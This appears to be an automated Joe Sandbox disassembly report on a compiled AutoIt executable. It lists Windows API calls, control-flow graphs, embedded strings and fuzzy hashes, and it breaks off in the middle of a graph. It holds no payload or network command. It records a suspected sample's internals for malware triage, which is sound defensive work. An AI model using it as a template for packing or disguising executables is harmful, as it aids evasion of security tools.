                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                • String ID: This is a third-party compiled AutoIt script.$runas
                                • API String ID: 529118366-3287110873
                                • Opcode ID: 0afecad1091ef3c1ae83a12e92fbae4c963a414e0816b213dd0dae684c88619c
                                • Instruction ID: e3ba75c895393b5f8d4aa145a1240457ad4185c64b20aa3bac38899c34adb46f
                                • Opcode Fuzzy Hash: 0afecad1091ef3c1ae83a12e92fbae4c963a414e0816b213dd0dae684c88619c
                                • Instruction Fuzzy Hash: 6151E672904249AACF21EFB4DD15EFE7BB8AF06710B0041B5F411632E1DFB84A0ACB21

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 996 aa4afe-aa4b5e call aa77c7 GetVersionExW call aa7d2c 1001 aa4c69-aa4c6b 996->1001 1002 aa4b64 996->1002 1003 addb90-addb9c 1001->1003 1004 aa4b67-aa4b6c 1002->1004 1005 addb9d-addba1 1003->1005 1006 aa4b72 1004->1006 1007 aa4c70-aa4c71 1004->1007 1009 addba4-addbb0 1005->1009 1010 addba3 1005->1010 1008 aa4b73-aa4baa call aa7e8c call aa7886 1006->1008 1007->1008 1018 addc8d-addc90 1008->1018 1019 aa4bb0-aa4bb1 1008->1019 1009->1005 1012 addbb2-addbb7 1009->1012 1010->1009 1012->1004 1014 addbbd-addbc4 1012->1014 1014->1003 1016 addbc6 1014->1016 1020 addbcb-addbce 1016->1020 1021 addca9-addcad 1018->1021 1022 addc92 1018->1022 1019->1020 1023 aa4bb7-aa4bc2 1019->1023 1024 addbd4-addbf2 1020->1024 1025 aa4bf1-aa4c08 GetCurrentProcess IsWow64Process 1020->1025 1030 addcaf-addcb8 1021->1030 1031 addc98-addca1 1021->1031 1026 addc95 1022->1026 1027 aa4bc8-aa4bca 1023->1027 1028 addc13-addc19 1023->1028 1024->1025 1029 addbf8-addbfe 1024->1029 1032 aa4c0a 1025->1032 1033 aa4c0d-aa4c1e 1025->1033 1026->1031 1034 addc2e-addc3a 1027->1034 1035 aa4bd0-aa4bd3 1027->1035 1038 addc1b-addc1e 1028->1038 1039 addc23-addc29 1028->1039 1036 addc08-addc0e 1029->1036 1037 addc00-addc03 1029->1037 1030->1026 1040 addcba-addcbd 1030->1040 1031->1021 1032->1033 1041 aa4c89-aa4c93 GetSystemInfo 1033->1041 1042 aa4c20-aa4c30 call aa4c95 1033->1042 1046 addc3c-addc3f 1034->1046 1047 addc44-addc4a 1034->1047 1043 aa4bd9-aa4be8 1035->1043 1044 addc5a-addc5d 1035->1044 1036->1025 1037->1025 1038->1025 1039->1025 1040->1031 1045 aa4c56-aa4c66 1041->1045 1053 aa4c7d-aa4c87 GetSystemInfo 1042->1053 1054 aa4c32-aa4c3f call aa4c95 1042->1054 1049 addc4f-addc55 1043->1049 1050 aa4bee 1043->1050 1044->1025 1052 addc63-addc78 1044->1052 1046->1025 1047->1025 1049->1025 1050->1025 1055 addc7a-addc7d 1052->1055 1056 addc82-addc88 1052->1056 1057 aa4c47-aa4c4b 1053->1057 1061 aa4c41-aa4c45 GetNativeSystemInfo 1054->1061 1062 aa4c76-aa4c7b 1054->1062 1055->1025 1056->1025 1057->1045 1060 aa4c4d-aa4c50 FreeLibrary 1057->1060 1060->1045 1061->1057 1062->1061
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 00AA4B2B
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                • GetCurrentProcess.KERNEL32(?,00B2FAEC,00000000,00000000,?), ref: 00AA4BF8
                                • IsWow64Process.KERNEL32(00000000), ref: 00AA4BFF
                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AA4C45
                                • FreeLibrary.KERNEL32(00000000), ref: 00AA4C50
                                • GetSystemInfo.KERNEL32(00000000), ref: 00AA4C81
                                • GetSystemInfo.KERNEL32(00000000), ref: 00AA4C8D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                • String ID:
                                • API String ID: 1986165174-0
                                • Opcode ID: a0b6494714bd123da256ee54f03f7e2ef5a21d1516b29edd73d04298b0e24d18
                                • Instruction ID: fc31df238eeff8183b007d8d9205f5ce5167cc61d40ff66d04ec933c3a9976d8
                                • Opcode Fuzzy Hash: a0b6494714bd123da256ee54f03f7e2ef5a21d1516b29edd73d04298b0e24d18
                                • Instruction Fuzzy Hash: 1D91B23154ABC0DEC731CB7885515AABFF4AF6A300B4449AEE0CB93B81D760E948C769

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1063 aa4fe9-aa5001 CreateStreamOnHGlobal 1064 aa5003-aa501a FindResourceExW 1063->1064 1065 aa5021-aa5026 1063->1065 1066 addd5c-addd6b LoadResource 1064->1066 1067 aa5020 1064->1067 1066->1067 1068 addd71-addd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 addd85-addd90 LockResource 1068->1069 1069->1067 1070 addd96-adddb4 1069->1070 1070->1067
                                APIs
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA4EEE,?,?,00000000,00000000), ref: 00AA4FF9
                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA4EEE,?,?,00000000,00000000), ref: 00AA5010
                                • LoadResource.KERNEL32(?,00000000,?,?,00AA4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F8F), ref: 00ADDD60
                                • SizeofResource.KERNEL32(?,00000000,?,?,00AA4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F8F), ref: 00ADDD75
                                • LockResource.KERNEL32(00AA4EEE,?,?,00AA4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F8F,00000000), ref: 00ADDD88
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                • String ID: SCRIPT
                                • API String ID: 3051347437-3967369404
                                • Opcode ID: c79371c0abb725b2e82e89b6dca118f7743c201d62c476076db97c617c7d4438
                                • Instruction ID: 104311a41f13f4fb766bbfd3d2d4191bee2b9a9aa66e0e3794f99c3781de840b
                                • Opcode Fuzzy Hash: c79371c0abb725b2e82e89b6dca118f7743c201d62c476076db97c617c7d4438
                                • Instruction Fuzzy Hash: 54115A75600701AFD7318B65DC58F6B7BB9EBCAB11F204578F506972A0EB61E8018661
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00ADE7C1), ref: 00B046A6
                                • FindFirstFileW.KERNELBASE(?,?), ref: 00B046B7
                                • FindClose.KERNEL32(00000000), ref: 00B046C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FileFind$AttributesCloseFirst
                                • String ID:
                                • API String ID: 48322524-0
                                • Opcode ID: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
                                • Instruction ID: f90498625498457f84e2e86c124d3b33f4dcd8d48412e5592cb4452c16b47515
                                • Opcode Fuzzy Hash: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
                                • Instruction Fuzzy Hash: 89E0D8718104019B8220A738EC4D4FA7BACDE07375F1007A5F935C20E0FBB059519599
                                Strings
                                • Variable must be of type 'Object'., xrefs: 00AE428C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID: Variable must be of type 'Object'.
                                • API String ID: 0-109567571
                                • Opcode ID: 28b196fae4dd9bb37d92cb5140f26874a65790e35b8acdc9583572b3b9c661b3
                                • Instruction ID: 20b73b37204ae649d7f0ca77f297f4b1bde367681213f2a1b68e538f8206c2a9
                                • Opcode Fuzzy Hash: 28b196fae4dd9bb37d92cb5140f26874a65790e35b8acdc9583572b3b9c661b3
                                • Instruction Fuzzy Hash: CFA2AE75A04205CFCB24CF98C984AAEB7F1FF4A314F248069E916AB391D775ED42CB91
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0BBB
                                • timeGetTime.WINMM ref: 00AB0E76
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0FB3
                                • TranslateMessage.USER32(?), ref: 00AB0FC7
                                • DispatchMessageW.USER32(?), ref: 00AB0FD5
                                • Sleep.KERNEL32(0000000A), ref: 00AB0FDF
                                • LockWindowUpdate.USER32(00000000,?,?), ref: 00AB105A
                                • DestroyWindow.USER32 ref: 00AB1066
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AB1080
                                • Sleep.KERNEL32(0000000A,?,?), ref: 00AE52AD
                                • TranslateMessage.USER32(?), ref: 00AE608A
                                • DispatchMessageW.USER32(?), ref: 00AE6098
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AE60AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                • API String ID: 4003667617-3242690629
                                • Opcode ID: 016326a467281276377842a82c888fe771abfa3f0ea47759fc73b496f00074c9
                                • Instruction ID: 6159df8b0bff1af8265c94e96e5babf5993935eb4a604124348cb8586f21f386
                                • Opcode Fuzzy Hash: 016326a467281276377842a82c888fe771abfa3f0ea47759fc73b496f00074c9
                                • Instruction Fuzzy Hash: 8AB2D170A08781DFD724DF24D994FAAB7E5BF85308F14491DF48A872A2DB74E844CB92

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00B091E9: __time64.LIBCMT ref: 00B091F3
                                  • Part of subcall function 00AA5045: _fseek.LIBCMT ref: 00AA505D
                                • __wsplitpath.LIBCMT ref: 00B094BE
                                  • Part of subcall function 00AC432E: __wsplitpath_helper.LIBCMT ref: 00AC436E
                                • _wcscpy.LIBCMT ref: 00B094D1
                                • _wcscat.LIBCMT ref: 00B094E4
                                • __wsplitpath.LIBCMT ref: 00B09509
                                • _wcscat.LIBCMT ref: 00B0951F
                                • _wcscat.LIBCMT ref: 00B09532
                                  • Part of subcall function 00B0922F: _memmove.LIBCMT ref: 00B09268
                                  • Part of subcall function 00B0922F: _memmove.LIBCMT ref: 00B09277
                                • _wcscmp.LIBCMT ref: 00B09479
                                  • Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AAE
                                  • Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AC1
                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B096DC
                                • _wcsncpy.LIBCMT ref: 00B0974F
                                • DeleteFileW.KERNEL32(?,?), ref: 00B09785
                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B0979B
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B097AC
                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B097BE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                • String ID:
                                • API String ID: 1500180987-0
                                • Opcode ID: 7928ab1fee2e85133d6021beed49024a0a93838a68a116d799302ee89d6380eb
                                • Instruction ID: 0342ee8b452cd57d7cf9ad1a4d79a9df6259075edd6a3c158d19c5cd50cbc142
                                • Opcode Fuzzy Hash: 7928ab1fee2e85133d6021beed49024a0a93838a68a116d799302ee89d6380eb
                                • Instruction Fuzzy Hash: 40C119B1D00219AADF21DFA5CD85EDEBBBDEF45300F0040AAB609E7192DB709A448F65

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00AA3074
                                • RegisterClassExW.USER32(00000030), ref: 00AA309E
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
                                • InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
                                • LoadIconW.USER32(000000A9), ref: 00AA30F2
                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                • API String ID: 2914291525-1005189915
                                • Opcode ID: 73d842ab4fe0107fab64bb9c314c0cb5cf77e81c0ac8f20c8445a65be055ea70
                                • Instruction ID: b7ca956a8ba12a7bd87e9dc521338678b8861f0bf353ee48af53198d83c0255b
                                • Opcode Fuzzy Hash: 73d842ab4fe0107fab64bb9c314c0cb5cf77e81c0ac8f20c8445a65be055ea70
                                • Instruction Fuzzy Hash: 6B31297194130AAFDB50CFA4E885AD9BBF0FB09310F10456AE590E72A0DBB94986CF51

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00AA3074
                                • RegisterClassExW.USER32(00000030), ref: 00AA309E
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
                                • InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
                                • LoadIconW.USER32(000000A9), ref: 00AA30F2
                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                • API String ID: 2914291525-1005189915
                                • Opcode ID: 6023ae5a87e92ebf952444347dda5421fd18abcf3d82203d9fb53abcf075f498
                                • Instruction ID: f7771518f60ff504862b5f2272beb918a588de8079723fc684a7028b6a55409c
                                • Opcode Fuzzy Hash: 6023ae5a87e92ebf952444347dda5421fd18abcf3d82203d9fb53abcf075f498
                                • Instruction Fuzzy Hash: F721C2B1D00219AFDB10DFA4ED89BEEBBF4FB08700F00452AFA10A72A0DBB545458F95

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00AA4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B662F8,?,00AA37C0,?), ref: 00AA4882
                                  • Part of subcall function 00AC074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AA72C5), ref: 00AC0771
                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA7308
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00ADECF1
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00ADED32
                                • RegCloseKey.ADVAPI32(?), ref: 00ADED70
                                • _wcscat.LIBCMT ref: 00ADEDC9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                • API String ID: 2673923337-2727554177
                                • Opcode ID: 54065347a93a055b5823a42abae5390bbaee4cd9df5ad21a04a7ee136d598c00
                                • Instruction ID: a63541c55b083e746aca4fff1e80d3273cc8c7dfedbc6ac4cd3998aaa9177a08
                                • Opcode Fuzzy Hash: 54065347a93a055b5823a42abae5390bbaee4cd9df5ad21a04a7ee136d598c00
                                • Instruction Fuzzy Hash: 4A715A715483019EC714EF25ED959AFBBF8FF9A744B40052EF446872A0EFB09948CBA1

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00AA3A62
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A71
                                • LoadIconW.USER32(00000063), ref: 00AA3A88
                                • LoadIconW.USER32(000000A4), ref: 00AA3A9A
                                • LoadIconW.USER32(000000A2), ref: 00AA3AAC
                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AD2
                                • RegisterClassExW.USER32(?), ref: 00AA3B28
                                  • Part of subcall function 00AA3041: GetSysColorBrush.USER32(0000000F), ref: 00AA3074
                                  • Part of subcall function 00AA3041: RegisterClassExW.USER32(00000030), ref: 00AA309E
                                  • Part of subcall function 00AA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
                                  • Part of subcall function 00AA3041: InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
                                  • Part of subcall function 00AA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
                                  • Part of subcall function 00AA3041: LoadIconW.USER32(000000A9), ref: 00AA30F2
                                  • Part of subcall function 00AA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                • String ID: #$0$AutoIt v3
                                • API String ID: 423443420-4155596026
                                • Opcode ID: 3580d9e3b3ebbc5985283c2ed00a134e6b7496736fd1398fde74e8ff866a475e
                                • Instruction ID: 599b37a64b05f04381c20cc7039c5d0f573291bd6fc550af14e1bf3249a02cb4
                                • Opcode Fuzzy Hash: 3580d9e3b3ebbc5985283c2ed00a134e6b7496736fd1398fde74e8ff866a475e
                                • Instruction Fuzzy Hash: EB210871940305ABEB149FA4ED19BAD7FB4EB08711F00412AF504A72E0DBBA5A548F94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 767 aa3633-aa3681 769 aa3683-aa3686 767->769 770 aa36e1-aa36e3 767->770 772 aa3688-aa368f 769->772 773 aa36e7 769->773 770->769 771 aa36e5 770->771 774 aa36ca-aa36d2 DefWindowProcW 771->774 777 aa375d-aa3765 PostQuitMessage 772->777 778 aa3695-aa369a 772->778 775 add31c-add34a call ab11d0 call ab11f3 773->775 776 aa36ed-aa36f0 773->776 779 aa36d8-aa36de 774->779 810 add34f-add356 775->810 781 aa36f2-aa36f3 776->781 782 aa3715-aa373c SetTimer RegisterWindowMessageW 776->782 780 aa3711-aa3713 777->780 783 add38f-add3a3 call b02a16 778->783 784 aa36a0-aa36a2 778->784 780->779 786 add2bf-add2c2 781->786 787 aa36f9-aa370c KillTimer call aa44cb call aa3114 781->787 782->780 788 aa373e-aa3749 CreatePopupMenu 782->788 783->780 801 add3a9 783->801 789 aa36a8-aa36ad 784->789 790 aa3767-aa3776 call aa4531 784->790 795 add2f8-add317 MoveWindow 786->795 796 add2c4-add2c6 786->796 787->780 788->780 798 add374-add37b 789->798 799 aa36b3-aa36b8 789->799 790->780 795->780 804 add2c8-add2cb 796->804 805 add2e7-add2f3 SetFocus 796->805 798->774 807 add381-add38a call af817e 798->807 808 aa374b-aa375b call aa45df 799->808 809 aa36be-aa36c4 799->809 801->774 804->809 811 add2d1-add2e2 call ab11d0 804->811 805->780 807->774 808->780 809->774 809->810 810->774 816 add35c-add36f call 